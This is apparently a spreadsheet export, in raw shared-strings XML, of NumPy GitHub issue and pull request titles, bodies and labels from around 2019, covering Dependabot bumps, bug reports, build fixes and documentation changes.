&gt; -   Added support for float values in `--cov-fail-under`. Contributed by Martín Gaitán in [\#311](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/311).
&gt; -   Various documentation fixes. Contributed by Juanjo Bazán, Andrew Murray and Albert Tugushev in [\#298](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/298), [\#299](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/299) and [\#307](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/307).
&gt; -   Various testing improvements. Contributed by Ned Batchelder, Daniel Hahler, Ionel Cristian Mărieș and Hugo van Kemenade in [\#313](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/313), [\#314](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/314), [\#315](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/315), [\#316](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/316), [\#325](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/325), [\#326](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/326), [\#334](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/334) and [\#335](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/335).
&gt; -   Added the `--cov-context` CLI options that enables coverage contexts. Only works with coverage 5.0+. Contributed by Ned Batchelder in [\#345](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/345).
&lt;/details&gt;
&lt;details&gt;
&lt;summary&gt;Commits&lt;/summary&gt;
- [`33894b5`](https://github.com/pytest-dev/pytest-cov/commit/33894b550e6445525461ae5dacd3cbbcf381ea41) Bump version: 2.8.0 → 2.8.1
- [`3aa43a0`](https://github.com/pytest-dev/pytest-cov/commit/3aa43a035631d005e5f64e62ff8d6876cc01ab19) Be more strict - return None so problems like [#348](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/issues/348) will trip up the later Non...
- [`a078b55`](https://github.com/pytest-dev/pytest-cov/commit/a078b5531896c7a5c12024dd9b1882607317ae99) Update changelog.
- [`5ef4767`](https://github.com/pytest-dev/pytest-cov/commit/5ef47676af88bd79764e234d0ace463dcaac4437) Fix regression described in [#348](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/issues/348) - not all reports returning the total.
- [`5df26bd`](https://github.com/pytest-dev/pytest-cov/commit/5df26bd6a1ad2756d5bbd658be24d83f052e4420) Bump version: 2.7.1 → 2.8.0
- [`9f227c2`](https://github.com/pytest-dev/pytest-cov/commit/9f227c292d53cab9fd17822e9896fa4934740272) Add xdist 0.30 and update bootstrap.py to work better (on windows too).
- [`5cc697f`](https://github.com/pytest-dev/pytest-cov/commit/5cc697fc2d2c5aa4aca93dbf0e1e2bf2e3df6bf0) Add a note about the cleanup fix.
- [`7c01530`](https://github.com/pytest-dev/pytest-cov/commit/7c01530fd079467275ec2fe27d7512aee34ea248) Update changelog and authors.
- [`994fb00`](https://github.com/pytest-dev/pytest-cov/commit/994fb00badbc523278342d9c6903aa4dff96ebd1) Update for coverage 5.0a8
- [`5f70ec4`](https://github.com/pytest-dev/pytest-cov/commit/5f70ec4e9da7e21123e6732bf8b7b79725fb49fb) Sort imports and add isort as a check.
- Additional commits viewable in [compare view](https://github.com/pytest-dev/pytest-cov/compare/v2.7.1...v2.8.1)
&lt;/details&gt;
&lt;br /&gt;
[![Dependabot compatibility score](https://api.dependabot.com/badges/compatibility_score?dependency-name=pytest-cov&amp;package-manager=pip&amp;previous-version=2.7.1&amp;new-version=2.8.1)](https://dependabot.com/compatibility-score.html?dependency-name=pytest-cov&amp;package-manager=pip&amp;previous-version=2.7.1&amp;new-version=2.8.1)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badge me` will comment on this PR with code to add a "Dependabot enabled" badge to your readme
Additionally, you can set the following in the `.dependabot/config.yml` file in this repo:
- Update frequency
- Out-of-range updates (receive only lockfile updates, if desired)
- Security updates (receive only security updates, if desired)
&lt;/details&gt;</t>
  </si>
  <si>
    <t>MAINT: Bump pytest-cov from 2.7.1 to 2.8.1</t>
  </si>
  <si>
    <t>As well as scipy and matplotlib, numpy also needs IPython to build the docs. This PR adds that to the development docs.</t>
  </si>
  <si>
    <t>DOC: Add IPython to dependencies needed to build docs.</t>
  </si>
  <si>
    <t>This I think breaks reading sub-array dtypes:_x000D_
```_x000D_
# After this PR_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; with open('/dev/zero', 'rb') as f:_x000D_
...     a = np.fromfile(f, dtype='(8,8)u8', count=1)_x000D_
... _x000D_
&gt;&gt;&gt; (a == 0).all()_x000D_
False_x000D_
```_x000D_
The reason I guess is that creating an array with sub-array dtype moves the array dimensions from the dtype to the array itself, so the number of bytes to read becomes incorrect._x000D_
_x000D_
_Originally posted by @pv in https://github.com/numpy/numpy/pull/14586/files__x000D_
_x000D_
_x000D_
----_x000D_
_x000D_
While fixing/writing tests, similar issues seem to happen in FromString. Probably it is best to switch to the old pattern of using the given dtype even though the array turns out representing it differently. At least `FromString` has a use-after-free bug with this pattern currently._x000D_
_x000D_
**EDIT:** I am planning to look at this, but if someone beats me to it, great :). It should not be difficult, but reference counting issues can be confusing..._x000D_
_x000D_
Test for anyone who wants to start (it may be worth to look at some other similar paths though):_x000D_
```python_x000D_
    def test_subarray_into_shape(self):_x000D_
        # Test subarray dtypes which are absorbed into the shape_x000D_
        x = np.arange(24, dtype="i4").reshape(2, 3, 4)_x000D_
        x.tofile(self.filename)_x000D_
        res = np.fromfile(self.filename, dtype="(3,4)i4")_x000D_
        assert_array_equal(x, res)_x000D_
_x000D_
        x_str = x.tobytes()_x000D_
        with assert_warns(DeprecationWarning):_x000D_
            # binary fromstring is deprecated_x000D_
            res = np.fromstring(x_str, dtype="(3,4)i4")_x000D_
            assert_array_equal(x, res)_x000D_
```</t>
  </si>
  <si>
    <t>BUG: fromfile with subarray dtypes is broken</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'priority: high']</t>
  </si>
  <si>
    <t xml:space="preserve">**Problem** : TypeError in numpy.rate when using Decimals_x000D_
For example: _x000D_
np.rate(Decimal(12), Decimal('400'), Decimal('10000'), Decimal(0))_x000D_
_x000D_
**Output** : (TypeError: unsupported operand type(s) for +: 'float' and 'Decimal')_x000D_
_x000D_
Proposed solution_x000D_
If the type of the "rn" variable is "Decimal", then do type conversion of "np.nan" to "Decimal" (to make operands for "+" operation compatible ) otherwise return as it is._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: Update financial.py : Use default_type() directly</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.lib.financial']</t>
  </si>
  <si>
    <t>Fixes #14633. I have also_x000D_
_x000D_
- Removed individual entries for everything in `misc_util` from the main page._x000D_
- Moved the `ConfigurationClass` doc down a section</t>
  </si>
  <si>
    <t>DOC:  Create `class Extension` docstring and add it to documentation.</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>[The f2py docs mention](https://docs.scipy.org/doc/numpy/f2py/distutils.html) that the `numpy.distutils.core.Extension` class can be used, but as far as I can tell there is no documentation of this class either in the main numpy documentation or in the f2py documentation.</t>
  </si>
  <si>
    <t>Add API documentation for np.distutils.core.Extension class</t>
  </si>
  <si>
    <t>In gh-14518 we repurposed the `verbose` option to `build_src` in order to quiet the configuration compiler output. Unfortunately it is [reset by distutils](https://github.com/python/cpython/blob/v3.6.9/Lib/distutils/cmd.py#L76) to the value of `dist.verbose`. Change the name to `--verbose-cfg` and remove the short `-v` option._x000D_
_x000D_
Also changed the `runtests.py` option to `debug-info` as per [this comment](https://github.com/numpy/numpy/pull/14568#issuecomment-533887229)</t>
  </si>
  <si>
    <t>BUILD: change to build_src --verbose-cfg, runtests.py --debug-info</t>
  </si>
  <si>
    <t>Closes #7213_x000D_
_x000D_
wording matches `resid -- sum of squared residuals of the least squares fit` which is present in several files ([polynomial.py](https://github.com/numpy/numpy/blob/master/numpy/polynomial/polynomial.py#L1251), _polybase.py, hermite.py, ...)</t>
  </si>
  <si>
    <t>DOC: clarify residual in np.polyfit</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>I hope this will also change PR title accordingly.</t>
  </si>
  <si>
    <t>MAINT: Add "MAINT" tag to dependabot commit msg</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: CI']</t>
  </si>
  <si>
    <t>Bumps [pytest](https://github.com/pytest-dev/pytest) from 5.1.3 to 5.2.0.
&lt;details&gt;
&lt;summary&gt;Release notes&lt;/summary&gt;
*Sourced from [pytest's releases](https://github.com/pytest-dev/pytest/releases).*
&gt; ## 5.2.0
&gt; pytest 5.2.0 (2019-09-28)
&gt; =========================
&gt; 
&gt; Deprecations
&gt; ------------
&gt; 
&gt; -   [\#1682](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/1682): Passing
&gt;     arguments to pytest.fixture() as positional arguments is
&gt;     deprecated - pass them as a keyword argument instead.
&gt; 
&gt; Features
&gt; --------
&gt; 
&gt; -   [\#1682](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/1682): The
&gt;     `scope` parameter of `@pytest.fixture` can now be a callable that
&gt;     receives the fixture name and the `config` object as keyword-only
&gt;     parameters. See [the
&gt;     docs](https://docs.pytest.org/en/fixture.html#dynamic-scope) for
&gt;     more information.
&gt; -   [\#5764](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5764): New
&gt;     behavior of the `--pastebin` option: failures to connect to the
&gt;     pastebin server are reported, without failing the pytest run
&gt; 
&gt; Bug Fixes
&gt; ---------
&gt; 
&gt; -   [\#5806](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5806): Fix
&gt;     "lexer" being used when uploading to bpaste.net from `--pastebin`
&gt;     to "text".
&gt; -   [\#5884](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5884): Fix
&gt;     `--setup-only` and `--setup-show` for custom pytest items.
&gt; 
&gt; Trivial/Internal Changes
&gt; ------------------------
&gt; 
&gt; -   [\#5056](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5056): The
&gt;     HelpFormatter uses `py.io.get_terminal_width` for better
&gt;     width detection.
&lt;/details&gt;
&lt;details&gt;
&lt;summary&gt;Changelog&lt;/summary&gt;
*Sourced from [pytest's changelog](https://github.com/pytest-dev/pytest/blob/master/CHANGELOG.rst).*
&gt; pytest 5.2.0 (2019-09-28)
&gt; =========================
&gt; 
&gt; Deprecations
&gt; ------------
&gt; 
&gt; -   [\#1682](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/1682): Passing arguments to pytest.fixture() as positional arguments is deprecated - pass them as a keyword argument instead.
&gt; 
&gt; Features
&gt; --------
&gt; 
&gt; -   [\#1682](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/1682): The `scope` parameter of `@pytest.fixture` can now be a callable that receives the fixture name and the `config` object as keyword-only parameters. See [the docs](https://docs.pytest.org/en/fixture.html#dynamic-scope) for more information.
&gt; -   [\#5764](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5764): New behavior of the `--pastebin` option: failures to connect to the pastebin server are reported, without failing the pytest run
&gt; 
&gt; Bug Fixes
&gt; ---------
&gt; 
&gt; -   [\#5806](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5806): Fix "lexer" being used when uploading to bpaste.net from `--pastebin` to "text".
&gt; -   [\#5884](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5884): Fix `--setup-only` and `--setup-show` for custom pytest items.
&gt; 
&gt; Trivial/Internal Changes
&gt; ------------------------
&gt; 
&gt; -   [\#5056](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5056): The HelpFormatter uses `py.io.get_terminal_width` for better width detection.
&lt;/details&gt;
&lt;details&gt;
&lt;summary&gt;Commits&lt;/summary&gt;
- [`068ef90`](https://github.com/pytest-dev/pytest/commit/068ef90b92a9e9205af31cb3d82e7d2a433ff969) Preparing release version 5.2.0
- [`065773a`](https://github.com/pytest-dev/pytest/commit/065773aa97a02731e5eec05e29204b50850d9248) Use 'python3' instead of 'python3.6' on tox
- [`b622768`](https://github.com/pytest-dev/pytest/commit/b62276826c708ec4138c622b396fec711d5a836c) Merge pull request [#5886](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5886) from nicoddemus/setup-plan-custom-items-5884
- [`7bdfba3`](https://github.com/pytest-dev/pytest/commit/7bdfba3578455b58589e5834fea3feaf932018bd) Fix --setup-only and --setup-show for custom pytest items
- [`6bfd30d`](https://github.com/pytest-dev/pytest/commit/6bfd30d169c3192befb4cfd9b267caad7efb56cd) Merge pull request [#5878](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5878) from blueyed/codecov-retry-6
- [`7731e45`](https://github.com/pytest-dev/pytest/commit/7731e456151337a2830736115396d023c8188884) ci: codecov: use 6 retries with curl
- [`8806b1f`](https://github.com/pytest-dev/pytest/commit/8806b1f531683daebd819a297d059ee199879efb) Merge pull request [#5875](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5875) from asottile/patch-1
- [`19c9e53`](https://github.com/pytest-dev/pytest/commit/19c9e536044b969bf7c5377e7b0a5dff55a6accf) Make sure to quote `sys.executable` as we're running a shell
- [`c28b631`](https://github.com/pytest-dev/pytest/commit/c28b63135f53028bb0bcfb129f1dce757b4dfc0e) Merge master into features ([#5874](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5874))
- [`7c64d5d`](https://github.com/pytest-dev/pytest/commit/7c64d5d88243259e0bbd3a472e5ca7510d5cd9dc) Do not call python directly but use sys.executable. Fixes [#5872](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5872) ([#5873](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5873))
- Additional commits viewable in [compare view](https://github.com/pytest-dev/pytest/compare/5.1.3...5.2.0)
&lt;/details&gt;
&lt;br /&gt;
[![Dependabot compatibility score](https://api.dependabot.com/badges/compatibility_score?dependency-name=pytest&amp;package-manager=pip&amp;previous-version=5.1.3&amp;new-version=5.2.0)](https://dependabot.com/compatibility-score.html?dependency-name=pytest&amp;package-manager=pip&amp;previous-version=5.1.3&amp;new-version=5.2.0)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badge me` will comment on this PR with code to add a "Dependabot enabled" badge to your readme
Additionally, you can set the following in the `.dependabot/config.yml` file in this repo:
- Update frequency
- Out-of-range updates (receive only lockfile updates, if desired)
- Security updates (receive only security updates, if desired)
Finally, you can contact us by mentioning @dependabot.
&lt;/details&gt;</t>
  </si>
  <si>
    <t>MAINT: Bump pytest from 5.1.3 to 5.2.0</t>
  </si>
  <si>
    <t>Part of the C-API overhaul in gh-14608 and gh-14604, and should be merged first to simplify the distribution function renaming._x000D_
_x000D_
`double_fill` had an interface that required a `fill` variant of the sampling function, while `float_fill` and `float_fill_from_double` were different. Align the interfaces and remove the `fill variants in `distributions.c` and `distributions.h`.</t>
  </si>
  <si>
    <t>MAINT: align random double_fill to float_fill, simplify distributions.c</t>
  </si>
  <si>
    <t>This is the code part of #14604 to cleanup the api and allow numpy.random to be used from cython._x000D_
_x000D_
Principles:_x000D_
- [x] since the `pxd` files define the cython API, any **public except mtrand** `*.so` should ship a `*.pxd` and any `*.pxd` should have a `*.so`. Any "private" `*.so` should begin with `_`. Edit: qualify to state "public except mtrand", which cannot be made private as per NEP 19. We only have private c-extension modules now, so there are no `pxd` files to ship._x000D_
- [x] move h files needed by the pxd files into `numpy/random/include`_x000D_
- [x] ~ship the `pxd` files and headers~ Edit: there are no pxd or headers to ship _x000D_
_x000D_
Cleanup_x000D_
- [x] `common` -&gt; `_common`_x000D_
- [x] `bound_integers` -&gt; `_bound_integers` ?_x000D_
- [x] don't import `*`_x000D_
- [x] remove `libc` imports from `_common`, let each `pxd` import on its own_x000D_
- [x] move `bitgen_t` from `common` to `bit_generator.pxd`_x000D_
- [x] fold `distributions.pxd` into `generator.pxd`, `legacy_distributions.pxd` into `mtrans.pxd`. _x000D_
_x000D_
Renaming and removing unused functions in `distributions.h` and `legacy_distributions.h`_x000D_
- [x] `random_gauss_zig` -&gt; `random_standard_normal`_x000D_
- [x] all the others should loose the `zig` suffix_x000D_
  edit: except `random_standard_exponential_zig`_x000D_
- [x] make the float versions consistent with `_f` suffix_x000D_
- [x] `random_double` -&gt; ~`random_random` for consistency with `random.random`~ `random_standard_uniform`_x000D_
- [x] functions that are not used should be removed_x000D_
- [x] `random_geometric_*` do not need to be exposed_x000D_
- [x] cleanup `gauss` names_x000D_
_x000D_
After this cleanup we can create some cython user stories and check that the API is sufficient.</t>
  </si>
  <si>
    <t>API: rearrange the cython files in numpy.random</t>
  </si>
  <si>
    <t>['01 - Enhancement', '30 - API', 'component: numpy.random']</t>
  </si>
  <si>
    <t>`PyArray_DescrCheck` was defined incorrectly. Redefine and add `PyArray_DescrCheckExact`._x000D_
_x000D_
This becomes a problem if we allow subclassing `PyArrayDescr_Type`, and should be backported to any version we still support to prevent issues when using a newer NumPy with code compiled with an older NumPy. Searching scipy/pandas/astropy/numba only turned up a use inside numba. Once this is merged we should submit an issue there to work around this for old versions.</t>
  </si>
  <si>
    <t>BUG: properly define PyArray_DescrCheck{,Exact}</t>
  </si>
  <si>
    <t xml:space="preserve">* Clarify that NEP Resolution should point to email thread_x000D_
* Add correct resolution thread for RNG NEP_x000D_
* Fix typo in NEP 24_x000D_
</t>
  </si>
  <si>
    <t>NEP: Fix discrepancies in NEPs</t>
  </si>
  <si>
    <t>A week has passed since the formal proposal to accept NEP 32, with no substantive objections.</t>
  </si>
  <si>
    <t>NEP: Accept NEP 32.</t>
  </si>
  <si>
    <t xml:space="preserve">The Unicode checkmark doesn't necessarily have the same width as the_x000D_
ASCII characters, even when rendered with a fixed-width font, so the_x000D_
casting table can be misaligned when the checkmark is used._x000D_
</t>
  </si>
  <si>
    <t>DOC: Change the promotion table checkmark to 'Y'.</t>
  </si>
  <si>
    <t xml:space="preserve">Callers are now presented with a more informative and accurate exception_x000D_
if PyUnicode_FromEncodedObject() fails deep inside_x000D_
PyArray_DescrConverter() due to a text decoding issue._x000D_
_x000D_
---_x000D_
_x000D_
This change was suggested in #14368._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Propagate UnicodeDecodeError from PyArray_DescrConverter()</t>
  </si>
  <si>
    <t>gh-13605 did not handle refcounts of dtype instances. I discovered this by running_x000D_
```_x000D_
python runtests.py -t numpy/core/tests/test_deprecations.py_x000D_
```_x000D_
which printed the following twice at the end_x000D_
```_x000D_
*** Reference count error detected: _x000D_
an attempt was made to deallocate 12 (d) ***_x000D_
```_x000D_
_x000D_
The lack of those reference count errors when running all the tests (before this PR) would suggest we have places in the code that leak references by incref-ing without decref-ing.</t>
  </si>
  <si>
    <t>BUG: dtype refcount cleanups</t>
  </si>
  <si>
    <t>In wrap and clip modes ravel_multi_index crashes or gave_x000D_
invalid results if input arrays were empty but the shape not._x000D_
_x000D_
_x000D_
---_x000D_
_x000D_
A small silly fix from 7 years ago I found while trying to clean up my branches a bit.</t>
  </si>
  <si>
    <t>BUG: Add missing check for 0-sized array in ravel_multi_index</t>
  </si>
  <si>
    <t>xref gh-11521. This behaviour was deprecated in NumPy 1.9._x000D_
_x000D_
I am not sure about how we refer to expired deprecations. "Remove", "Resolve", "Retire" ?</t>
  </si>
  <si>
    <t>DEP: remove deprecated select behaviour</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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from numpy.ma import version_x000D_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```pytb_x000D_
In [3]: from numpy.ma import version                                                   _x000D_
---------------------------------------------------------------------------_x000D_
AttributeError                            Traceback (most recent call last)_x000D_
&lt;ipython-input-3-148a8dfb1aa3&gt; in &lt;module&gt;_x000D_
----&gt; 1 from numpy.ma import version_x000D_
_x000D_
~/miniconda3/envs/f7/lib/python3.7/site-packages/numpy/ma/version.py in &lt;module&gt;_x000D_
     10     from . import core_x000D_
     11     from . import extras_x000D_
---&gt; 12     revision = [core.__revision__.split(':')[-1][:-1].strip(),_x000D_
     13                 extras.__revision__.split(':')[-1][:-1].strip(),]_x000D_
     14     version += '.dev%04i' % max([int(rev) for rev in revision])_x000D_
_x000D_
AttributeError: module 'numpy.ma.core' has no attribute '__revision__'_x000D_
```_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.17.0 3.7.3 | packaged by conda-forge | (default, Jul  1 2019, 21:52:21) _x000D_
[GCC 7.3.0]_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Attribute Error when trying to import numpy.ma.version</t>
  </si>
  <si>
    <t>['component: numpy.ma']</t>
  </si>
  <si>
    <t xml:space="preserve">Create a legacy implementation of the random_binomial method of_x000D_
RandomState that does not include the "short-circuit" check for_x000D_
n == 0 or p == 0.  This ensures that the stream of variates_x000D_
is consistent with the behavior in 1.16._x000D_
_x000D_
Closes gh-14522._x000D_
</t>
  </si>
  <si>
    <t>BUG: random: Create a legacy implementation of random.binomial.</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.random']</t>
  </si>
  <si>
    <t>Currently the ":c:data:" links could not resolve these because the values were not explicitly documented._x000D_
_x000D_
Also removes some duplication with the doc of `PyArray_ScalarKind`._x000D_
_x000D_
Current documentation: https://numpy.org/devdocs/reference/c-api/array.html#c.NPY_SCALARKIND</t>
  </si>
  <si>
    <t>DOC: Document the NPY_SCALARKIND values as C variables.</t>
  </si>
  <si>
    <t>Most submodule docstrings are unused for generating the html docs, only for viewing with `?` in IPython or similar. So a short and up-to-date statement of where to go look for info or how to use the module is much more useful than the outdated stuff in the `info.py` files that was there.</t>
  </si>
  <si>
    <t>DOC: update submodule docstrings, remove info.py files</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', '56 - Needs Release Note.']</t>
  </si>
  <si>
    <t>It turns out importing `build_src` in the `setup.py` breaks a numpy-specific monkey patch of setuptools for msvc14. Not sure why this only shows up in the wheel builds. The reason for the import was to improve the help message output for `python setup.py --help-commands`.  `build_src`, a numpy-specific addition, is not listed in the `Extra commands` section._x000D_
_x000D_
xref MacPython/numpy-wheels#61_x000D_
_x000D_
At some point we could revisit this, but this PR should un-break the wheel builds.</t>
  </si>
  <si>
    <t>BUG: importing build_src breaks setuptools monkeypatch for msvc14</t>
  </si>
  <si>
    <t>In gh-14518 we added a `--debug-configure`` option, but it didn't work. In one of the refactoring I made the option default value False when it should have been None._x000D_
_x000D_
Also added a release note for both gh-14518 and gh-14527. Manually added the second PR's tag line since towncrier will create the first one. Suggestions to improve the release note text are welcome</t>
  </si>
  <si>
    <t>BLD, DOC: fix gh-14518, add release note</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation', 'component: build']</t>
  </si>
  <si>
    <t>Removes these files that were deprecated since 1.15.0:_x000D_
_x000D_
- numpy/testing/decorators.py_x000D_
- numpy/testing/noseclasses.py_x000D_
- numpy/testing/nosetester.py_x000D_
_x000D_
This also resolves a failure in the recently introduced tests in `test_public_api.py` (see gh-14454).  Closes gh-14566</t>
  </si>
  <si>
    <t>DEP: remove deprecated (and private) numpy.testing submodules.</t>
  </si>
  <si>
    <t xml:space="preserve">When I have used np.float16(20240) it gives converted value as 20240.0. But when used with an array as  array.dtype = np.float16, got the converted value for 20240 as 28.25.  What conversion is done there?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DEP: consider Deprecating `arr.dtype = ...` attribute setting</t>
  </si>
  <si>
    <t>['07 - Deprecation', '15 - Discussion', 'component: numpy.core']</t>
  </si>
  <si>
    <t>TST: ensure coercion tables aren't printed on failing public API test</t>
  </si>
  <si>
    <t>Closes gh-14552_x000D_
_x000D_
The Pocketfft author (mreineck) agreed on gh-14552 that Pocketfft can_x000D_
simply fall under the NumPy license, no separate license file needed._x000D_
_x000D_
[ci skip]</t>
  </si>
  <si>
    <t>DOC: remove note about Pocketfft license file (non-existing here).</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.fft']</t>
  </si>
  <si>
    <t>See https://mail.python.org/pipermail/numpy-discussion/2019-September/080088.html_x000D_
for discussion. We need to do this right, and add tests and docs._x000D_
All this PR does is not install `bitgen.h`, `common.pxd` and `bit_generator.pxd`_x000D_
(they're still shipped in the sdist, that is needed)._x000D_
_x000D_
Should be backported to 1.17.x_x000D_
_x000D_
For https://numpy.org/devdocs/reference/random/extending.html#cython, we can either leave that in master and only remove it in 1.17.x, or remove it in master until we're ready to add the functionality - what is preferred?</t>
  </si>
  <si>
    <t>MAINT: don't install partial numpy.random C/Cython API.</t>
  </si>
  <si>
    <t>MAINT:  Fix dictionary being traversed twice</t>
  </si>
  <si>
    <t>Would it be feasible to have matrix/scalar and vector/scalar multiplication in `np.matmul` match behavior of `np.dot`?_x000D_
_x000D_
Since`np.matmul` already supports mixing rank-2 and rank-1 tensors, extending it to rank-0 would not make it more confusing._x000D_
_x000D_
The reason for not using `np.dot` is because of preference for matmul broadcasting rules (see https://github.com/tensorflow/tensorflow/issues/5523)</t>
  </si>
  <si>
    <t>Support matrix/scalar multiplication for `np.matmul`</t>
  </si>
  <si>
    <t>['23 - Wish List', '57 - Close?']</t>
  </si>
  <si>
    <t>The old code was Python 2 only.</t>
  </si>
  <si>
    <t>DOC: Fix code that generates the table in the 'Casting Rules' section.</t>
  </si>
  <si>
    <t xml:space="preserve">The description of the input parameter for genfromtext has become garbled to the extent that it is incorrect. A literal reading of the current text suggests that the function would accept the _name_  of an open file-like object _as a string_ but would not accept a file-like object directly. In reality the function accepts an file-like object directly as would be intuitive for most users and as is described in the docs for genfromtext. This commit simplifies the sentence structure and gives it the correct meaning._x000D_
</t>
  </si>
  <si>
    <t>DOC: clarify input types in basics.io.genfromtxt.rst</t>
  </si>
  <si>
    <t xml:space="preserve">The ufuncs log, exp, sin, cos and sqrt had two occurrences of the signature_x000D_
ee-&gt;e, with the corresponding generic loop function PyUFunc_e_e_As_f_f._x000D_
This change removes the generation of the duplicated function from the_x000D_
array of inner loops for these ufuncs.  The *first* entry of ee-&gt;e is_x000D_
kept; tests fail if the first one is removed instead of the second._x000D_
</t>
  </si>
  <si>
    <t>MAINT: core: Remove duplicated inner loop ee-&gt;e from log, exp, sin, cos, sqrt.</t>
  </si>
  <si>
    <t>When i try to run a python script that uses numpy, i receive the following error:_x000D_
ImportError: Unable to import required dependencies._x000D_
..._x000D_
Original error was: /lib/arm-linux-gnueabihf/libm.so.6: version `GLIBC_2.27' not found (required by /usr/local/lib/python3.7/site-packages/numpy/core/_multiarray_umath.cpython-37m-arm-linux-gnueabihf.so)"_x000D_
_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
Can be reproduced simply with this:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
_Traceback (most recent call last):_x000D_
  File "&lt;pyshell#0&gt;", line 1, in &lt;module&gt;_x000D_
    import numpy_x000D_
  File "/usr/local/lib/python3.7/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/usr/local/lib/python3.7/site-packages/numpy/core/__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError: _x000D_
_x000D_
IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!_x000D_
_x000D_
Importing the numpy c-extensions failed._x000D_
- Try uninstalling and reinstalling numpy._x000D_
- If you have already done that, then:_x000D_
  1. Check that you expected to use Python3.7 from "/usr/local/bin/python3.7",_x000D_
     and that you have no directories in your PATH or PYTHONPATH that can_x000D_
     interfere with the Python and numpy version "1.17.2"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 If you're working with a numpy git repository, try `git clean -xdf`_x000D_
  (removes all files not under version control) and rebuild numpy._x000D_
_x000D_
Note: this error has many possible causes, so please don't comment on_x000D_
an existing issue about this - open a new one instead._x000D_
_x000D_
Original error was: /lib/arm-linux-gnueabihf/libm.so.6: version `GLIBC_2.27' not found (required by /usr/local/lib/python3.7/site-packages/numpy/core/_multiarray_umath.cpython-37m-arm-linux-gnueabihf.so)__x000D_
 _x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Unable to run the recommended command, but here is what I know about the version info:_x000D_
Python is 3.7 (if I import numpy on 3.5 or 2.7 it works)_x000D_
numpy is 1.17.2_x000D_
_x000D_
_x000D_
### Additional Info_x000D_
_x000D_
     - how you installed Python: I'm sorry I don't remember how or know how to find out._x000D_
     - how you installed numpy: tried several ways, the most recent being `sudo pip3.7 install numpy`_x000D_
     - your operating system: Linux raspberrypi 4.19.66-v7+ #1253 SMP Thu Aug 15 11:49:46 BST 2019 armv7l GNU/Linux_x000D_
     - whether or not you have multiple versions of Python installed: 2.7, 3.5, 3.7  Possibly others, I'm not sure how to tell._x000D_
     - if you built from source, your compiler versions and ideally a build log: Not sure where to grab this._x000D_
_x000D_
I should note that I first received this error and got "libf77blas.so.3...no such file" for the "Original error" section. I made it past that by installing some dependencies from here: https://stackoverflow.com/questions/53347759/importerror-libcblas-so-3-cannot-open-shared-object-file-no-such-file-or-dire_x000D_
_x000D_
I apologize for the lack of details. I'm new to Linux and relatively new to Python, but I'll happily gather anything else that's needed if you can point me in the right direction.</t>
  </si>
  <si>
    <t>ImportError on Raspberry Pi</t>
  </si>
  <si>
    <t>Hello,_x000D_
numpy/fft/README.md says_x000D_
_x000D_
&gt; License_x000D_
&gt; -------_x000D_
&gt;_x000D_
&gt; 3-clause BSD (see LICENSE.md)_x000D_
_x000D_
but no LICENSE.md file is present in the repo (and thus the release tarball too)._x000D_
_x000D_
Could you please include that file too? thanks!</t>
  </si>
  <si>
    <t>PocketFFT missing LICENSE.md</t>
  </si>
  <si>
    <t xml:space="preserve">I am having this numerical error._x000D_
